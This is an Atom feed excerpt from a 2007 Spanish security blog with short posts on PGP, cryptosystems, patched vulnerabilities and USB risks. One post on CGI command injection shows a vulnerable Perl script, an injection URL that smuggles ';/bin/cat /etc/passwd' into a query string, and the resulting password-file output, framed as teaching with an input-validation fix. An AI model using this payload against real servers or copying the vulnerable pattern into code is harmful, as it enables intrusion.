[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-3699327538743151085?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/3699327538743151085/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=3699327538743151085&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3699327538743151085'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3699327538743151085'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/ataques-servidor-web-4.html' title='Ataques - Servidor Web 4'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_nams9blykQY/R1yfOne7RuI/AAAAAAAAABU/7m_uuUqK_7U/s72-c/sqlinjection.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-3707036578420966868</id><published>2007-12-09T18:36:00.000-03:00</published><updated>2008-12-10T12:33:58.100-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Taller de PGP</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_QbjL4lTr2UU/R1xkUHhKAfI/AAAAAAAAAK8/yZp7eZJir0I/s1600-h/TallerDeSeguridad.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 97px; height: 97px;" src="http://1.bp.blogspot.com/_QbjL4lTr2UU/R1xkUHhKAfI/AAAAAAAAAK8/yZp7eZJir0I/s200/TallerDeSeguridad.png" alt="" id="BLOGGER_PHOTO_ID_5142095171328541170" border="0" /&gt;&lt;/a&gt;Vamos a comenzar con los &lt;span style="font-style: italic;"&gt;Talleres&lt;/span&gt; o &lt;span style="font-style: italic;"&gt;Review&lt;/span&gt; de algunas herramientas de seguridad, en esta primera oportunidad les vamos a mostrar la herramienta &lt;span style="font-weight: bold;"&gt;Pretty Good Privacy&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;PGP&lt;/span&gt;, seguramente habrás visto algunos post referentes a este tema, pero lo que queremos lograr con este Taller y con los próximos que vamos a realizar es completar en su totalidad estos temas.&lt;br /&gt;&lt;br /&gt;Ahora el resumen de los temas a tratar en este Taller denominado "&lt;span style="font-weight: bold;"&gt;Taller de PGP&lt;/span&gt;":&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://seguridadsegura.blogspot.com/2007/12/pretty-good-privacy-pgp.html"&gt;¿Qué es PGP?&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://seguridadsegura.blogspot.com/2007/12/cmo-funciona-la-criptografa-de-clave.html"&gt;¿Como funciona la criptografía de Clave Pública?&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://seguridadsegura.blogspot.com/2007/12/que-son-las-firmas-digitales.html"&gt;¿Que son las Firmas Digitales?&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://seguridadsegura.blogspot.com/2007/12/instalando-pgp-en-nuestra-mquina.html"&gt;Instalando PGP en nuestra máquina&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://seguridadsegura.blogspot.com/2007/12/creacin-de-un-par-de-claves.html"&gt;Creación de un par de Claves&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Añadiendo Claves a nuestro anillo&lt;/li&gt;&lt;li&gt;Extrayendo Claves de nuestro anillo&lt;/li&gt;&lt;li&gt;Encriptando Mensajes&lt;/li&gt;&lt;li&gt;¿Cómo Firmar un Mensaje?&lt;/li&gt;&lt;li&gt;Desencriptando&lt;/li&gt;&lt;li&gt;El uso de PGP en los Correos Electrónicos&lt;/li&gt;&lt;li&gt;Conclusiones&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-3707036578420966868?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/3707036578420966868/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=3707036578420966868&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3707036578420966868'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3707036578420966868'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/taller-de-pgp.html' title='Taller de PGP'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_QbjL4lTr2UU/R1xkUHhKAfI/AAAAAAAAAK8/yZp7eZJir0I/s72-c/TallerDeSeguridad.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-5295086753919056514</id><published>2007-12-08T13:42:00.000-03:00</published><updated>2007-12-08T13:47:54.219-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>Pretty Good Privacy - PGP</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.rogerwendell.com/images/pgp/pgp_logo.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 138px; height: 194px;" src="http://www.rogerwendell.com/images/pgp/pgp_logo.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Pretty Good Privacy&lt;/span&gt; o &lt;span style="font-weight: bold;"&gt;PGP&lt;/span&gt; (privacidad bastante buena) es un programa desarrollado por Phil Zimmermann y cuya finalidad es proteger la información distribuida a través de Internet mediante el uso de criptografía de &lt;a href="http://seguridadsegura.blogspot.com/2007/12/criptografa-asimtrica.html"&gt;clave pública&lt;/a&gt; o &lt;a href="http://seguridadsegura.blogspot.com/2007/12/criptografa-asimtrica.html"&gt;Criptografía Asimétrica&lt;/a&gt;, así como facilitar la autenticación de documentos gracias a firmas digitales.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;PGP&lt;/span&gt; originalmente fue diseñado y desarrollado por Phil Zimmermann en 1991. El nombre está inspirado en el del colmado Ralph's Pretty Good Grocery de Lake Wobegon, una ciudad ficticia inventada por el locutor de radio Garrison Keillor.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-5295086753919056514?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/5295086753919056514/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=5295086753919056514&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5295086753919056514'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5295086753919056514'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/pretty-good-privacy-pgp.html' title='Pretty Good Privacy - PGP'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-3008523600273709708</id><published>2007-12-08T12:22:00.000-03:00</published><updated>2007-12-08T12:25:48.590-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Nueva versión de Skype corrige vulnerabilidad crítica</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.theslogan.com/es_content/images/stories/logos/skype.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 172px; height: 130px;" src="http://www.theslogan.com/es_content/images/stories/logos/skype.jpg" alt="" border="0" /&gt;&lt;/a&gt;La última versión 3.6 de &lt;span style="font-weight: bold;"&gt;Skype&lt;/span&gt; corrige una vulnerabilidad crítica que puede llevar al compromiso total de una máquina Windows, y una vez más parece que lo hace en riguroso secreto, por cuanto su sección de &lt;a href="http://www.skype.com/security/bulletins.html" rel="nofollow"&gt;avisos de seguridad&lt;/a&gt; no muestra información alguna al respecto. &lt;p&gt;Se trata de una variante del famoso &lt;a href="http://www.kriptopolis.org/microsoft-admite-grave-vulnerabilidad-windows" rel="nofollow"&gt;bug&lt;/a&gt; en el manejo de URIs en Windows, que tantos quebraderos de cabeza viene produciendo. No se sabe si la vulnerabilidad ha sido de hecho introducida con el parche para ese problema que Skype presentó a finales del pasado mes de septiembre, en su versión 3.5.0.239 para Windows...&lt;/p&gt; &lt;p&gt;Si algo está claro, es que los usuarios de Skype deben actualizar su programa cliente a la última versión 3.6 cuanto antes.&lt;/p&gt;&lt;p&gt;Artículo completo &lt;a href="http://www.kriptopolis.org/skype-corrige-vulnerabilidad-critica"&gt;Kriptopolis&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-3008523600273709708?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/3008523600273709708/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=3008523600273709708&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3008523600273709708'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3008523600273709708'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/nueva-versin-de-skype-corrige.html' title='Nueva versión de Skype corrige vulnerabilidad crítica'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-935151393919772791</id><published>2007-12-07T18:25:00.000-03:00</published><updated>2008-12-10T12:33:58.374-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Ataques - Servidor Web 3</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nams9blykQY/R1nDJHe7RtI/AAAAAAAAABM/a-5FzsC3x9I/s1600-h/cgi.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://3.bp.blogspot.com/_nams9blykQY/R1nDJHe7RtI/AAAAAAAAABM/a-5FzsC3x9I/s320/cgi.gif" alt="" id="BLOGGER_PHOTO_ID_5141355011015132882" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CGIs  (Command execution attack)&lt;/span&gt;&lt;br /&gt;Es un estándar para comunicar aplicaciones externas con los servidores de información, tales como servidores Web.&lt;br /&gt;Un programa CGI es ejecutado en tiempo real, así que puede generar información dinámica.&lt;br /&gt;Una de las razones por las cuales las vulnerabilidades en los CGIs están tan extendidas es el hecho de que la mayoría de los CGIs han sido programados por usuarios para dar dinamismo a sus paginas pero sin preocuparse de las implicaciones de seguridad.&lt;br /&gt;&lt;br /&gt;Consiste en la ejecución de comandos del sistema, se produce cuando datos sin validar   introducidos por el usuario conforman parte de una llamada del programa a un subshell. A veces el programador llama a algún comando del sistema para que realice la acción necesaria en vez de implementarla con código propio.&lt;br /&gt;&lt;br /&gt;Ej.:&lt;br /&gt;&lt;endofhtml;&gt;&lt;/endofhtml;&gt;&lt;blockquote&gt;#!/usr/bin/perl&lt;br /&gt;print "Content-type:text/html\n\n";&lt;br /&gt;print &lt;code&gt;&lt;&lt;/code&gt;&lt;code&gt;&lt; &lt;/code&gt;EndOfHTML;&lt;br /&gt;&lt;code&gt;&lt;&lt;/code&gt;&lt;span style="font-family:monospace;"&gt;&lt;/span&gt;html&lt;code&gt;&lt;/code&gt;&lt;span style="font-family:monospace;"&gt;&gt;&lt;/span&gt;&lt;code&gt; &lt;/code&gt;&lt;span style="font-family:monospace;"&gt;&lt;&lt;/span&gt;head&lt;code&gt;&amp;gt; &lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;span style="font-family:monospace;"&gt;&lt;&lt;/span&gt;title&lt;code&gt;&amp;gt; &lt;/code&gt;Print Environment &lt;code&gt;&lt;/code&gt;&lt;span style="font-family:monospace;"&gt;&lt;&lt;/span&gt;/title&lt;code&gt;&amp;gt;&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;span style="font-family:monospace;"&gt;&lt;&lt;/span&gt;/head&lt;code&gt;&amp;gt;&lt;/code&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;&lt;/code&gt;body&lt;code&gt;&amp;gt;&lt;/code&gt;&lt;br /&gt;EndOfHTML&lt;br /&gt;$HOST=$ENV{"QUERY_STRING"};&lt;br /&gt;$HOST=~ s/%(..)/pack("c",hex($1))/ge;&lt;br /&gt;print "Resolviendo Dominio $HOST";&lt;br /&gt;system("/usr/bin/nslookup $HOST");&lt;br /&gt;print "&lt;&lt;code&gt;&lt;/code&gt;br&lt;code&gt;&amp;gt;&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;span style="font-family:monospace;"&gt;&lt;&lt;/span&gt;/body&lt;code&gt;&amp;gt;&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;span style="font-family:monospace;"&gt;&lt;&lt;/span&gt;/html&lt;code&gt;&amp;gt;&lt;/code&gt;";&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Este programa en perl se encarga de resolver el dominio introducido por un usuario en un formulario web. Para ello utiliza el comando nslookup del sistema operativo. En es punto es donde reside el fallo. No se ha efectuado ninguna validación sobre los datos introducidos por el usuario en el formulario y enviados al CGI.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si quisiéramos por ejemplo listar el archivo de passwords del sistema haríamos:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;http://victima.com/cgi-bin/nslookup.cgi?falsodominio;/bin/cat%20/etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt; Salida:&lt;/span&gt;&lt;br /&gt;Resolviendo Dominio falsodominio;/bin/cat /etc/passwdServer: centauri&lt;br /&gt;Address: 172.26.0.5#53 ** server can't find falsodominio: NXDOMAIN&lt;br /&gt;root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh&lt;br /&gt;bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh&lt;br /&gt;sync:x:4:100:sync:/bin:/bin/sync&lt;br /&gt;games:x:5:100:games:/usr/games:/bin/sh&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Solución:&lt;/span&gt;&lt;br /&gt;Validar la entrada del usuario evitando la introducción de caracteres conflictivos como:&lt;br /&gt;     ; | .. / \ etc.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-935151393919772791?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/935151393919772791/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=935151393919772791&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/935151393919772791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/935151393919772791'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/ataques-servidor-web-3.html' title='Ataques - Servidor Web 3'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nams9blykQY/R1nDJHe7RtI/AAAAAAAAABM/a-5FzsC3x9I/s72-c/cgi.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-1319654297409908644</id><published>2007-12-07T11:23:00.000-03:00</published><updated>2007-12-07T11:26:33.288-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>Los Criptosistemas</title><content type='html'>Matemáticamente, podemos definir un criptosistema como una cuaterna de elementos {}, formada por:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Un conjunto finito llamado &lt;span style="font-weight: bold;"&gt;Alfabeto&lt;/span&gt;, a partir del cual, y utilizando ciertas normas sintácticas y semánticas, podremos emitir un mensaje en claro (plain text) u obtener el texto en claro correspondiente a un mensaje cifrado (cipher text). Frecuentemente, este alfabeto es el conjunto de los enteros módulo , , para un dado.&lt;/li&gt;&lt;li&gt;Otro conjunto finito denominado &lt;span style="font-weight: bold;"&gt;Espacio de Claves&lt;/span&gt;, formado por todas las posibles claves, tanto de cifrado como de descifrado, del &lt;span style="font-style: italic;"&gt;criptosistema&lt;/span&gt;.&lt;/li&gt;&lt;li&gt;Una familia de aplicaciones del alfabeto en sí mismo, llamadas &lt;span style="font-weight: bold;"&gt;Transformaciones de Cifrado&lt;/span&gt;.&lt;/li&gt;&lt;li&gt;Otra familia de aplicaciones del alfabeto en sí mismo, llamadas &lt;span style="font-weight: bold;"&gt;Transformaciones de Descifrado&lt;/span&gt;. &lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-1319654297409908644?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/1319654297409908644/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=1319654297409908644&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1319654297409908644'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1319654297409908644'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/los-criptosistemas.html' title='Los Criptosistemas'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-1005613052091088633</id><published>2007-12-07T11:08:00.000-03:00</published><updated>2007-12-07T11:10:40.191-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Denegacion de servicio en Squid</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://upload.wikimedia.org/wikipedia/en/b/b7/Squid-cache_logo.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px;" src="http://upload.wikimedia.org/wikipedia/en/b/b7/Squid-cache_logo.jpg" alt="" border="0" /&gt;&lt;/a&gt;Se ha descubierto una vulnerabilidad en &lt;a href="http://www.squid-cache.org/"&gt;Squid&lt;/a&gt; en el procesamiento de algunas actualizaciones del cache, esta vulnerabilidad permitiria a usuarios de confianza realizar un ataque de denegacion de servicio. La vulnerabilidad es corregida en la version &lt;a href="http://www.squid-cache.org/Versions/v2/2.6/changesets/11780.patch"&gt;2.6.STABLE17.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Artículo &lt;a href="http://www.retronet.com.ar/node/779"&gt;RetroNet&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-1005613052091088633?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/1005613052091088633/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=1005613052091088633&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1005613052091088633'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1005613052091088633'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/denegacion-de-servicio-en-squid.html' title='Denegacion de servicio en Squid'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-305462339649400156</id><published>2007-12-06T12:52:00.000-03:00</published><updated>2007-12-06T12:55:34.018-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Error de QuickTime explotado activamente en Internet</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.hkia.net/news_picture/quicktime.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://www.hkia.net/news_picture/quicktime.jpg" alt="" border="0" /&gt;&lt;/a&gt;El exploit Zero-Day anunciado hace una semana, está siendo activamente explotado en Internet, según informa Symantec, quién elevó su nivel de alertas a la posición número 2 (nivel medio).&lt;br /&gt;&lt;br /&gt;La explotación se produce a través del protocolo RTSP (Real Time Streaming Protocol), utilizado para realizar streaming, técnica de transmisión unidireccional de contenidos de video y audio a través de Internet.&lt;br /&gt;&lt;br /&gt;Se sabe que la vulnerabilidad está siendo explotada al menos a través de un servidor comprometido, y provoca la descarga de dos archivos maliciosos en el equipo de la víctima.&lt;br /&gt;&lt;br /&gt;En este momento, Apple no ha publicado todavía ninguna actualización de QuickTime para solucionar el problema. El ataque provoca un desbordamiento de búfer, provocado por un insuficiente control en QuickTime sobre el tamaño de ciertos datos recibidos.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://www.retronet.com.ar/node/777"&gt;&lt;span style="font-weight: bold;"&gt;RetroNet&lt;/span&gt;&lt;/a&gt;, &lt;span style="font-weight: bold;"&gt;VSAntivirus&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-305462339649400156?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/305462339649400156/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=305462339649400156&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/305462339649400156'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/305462339649400156'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/error-de-quicktime-explotado.html' title='Error de QuickTime explotado activamente en Internet'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-835635114912039157</id><published>2007-12-06T12:44:00.000-03:00</published><updated>2007-12-06T12:46:48.228-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Las llaves USB, un riesgo de seguridad</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://apeiron.laotracara.com/wp-content/imagenes/usbPenDrive0.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://apeiron.laotracara.com/wp-content/imagenes/usbPenDrive0.jpg" alt="" border="0" /&gt;&lt;/a&gt;Aunque los robos de portátiles están muy de moda, deberías estar atento a tu llave USB, un dispositivo que cada vez almacena más datos y que puede convertirse en un verdadero quebradero de cabeza si se pierde o nos lo roban.&lt;br /&gt;Un reciente evento dedicado a la seguridad que reunió a varios Chief Information Officer de varias empresas destacó un problema en el que pocos se habrían parado a pensar. Las llaves de memoria USB actuales logran almacenar hasta 16 Gbytes de datos y las previsiones son que llegarán tarde o temprano a los 128 Gbytes, una capacidad que los convertirá en discos duros portátiles muy susceptibles de ser robados y, cómo no, perdidos.&lt;br /&gt;&lt;br /&gt;El peligro reside en la gran cantidad de datos de todo tipo que pueden almacenarse en estos dispositivos, y lo es más cuando en el caso de algunos tipos de memoria - como las SanDisk Cruzer - es posible convertir las llaves USB en ‘PCs portátiles’ al llevar el sistema operativo, aplicaciones y datos con nosotros en todo momento. Una vez conectados a un PC y arrancando desde la llave, accederemos a un entorno de trabajo privado al que cualquiera podría tener acceso si se roba esa llave.&lt;br /&gt;&lt;br /&gt;Las contraseñas para acceder a las llaves USB o el cifrado de dato parecen las soluciones más claras para limitar esos riesgos, así que tened cuidado con lo que almacenáis en estos pequeños dispositivos.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://seguinfo.blogspot.com/2007/12/las-llaves-usb-un-riesgo-de-seguridad.html"&gt;&lt;span style="font-weight: bold;"&gt;Segu-Info&lt;/span&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
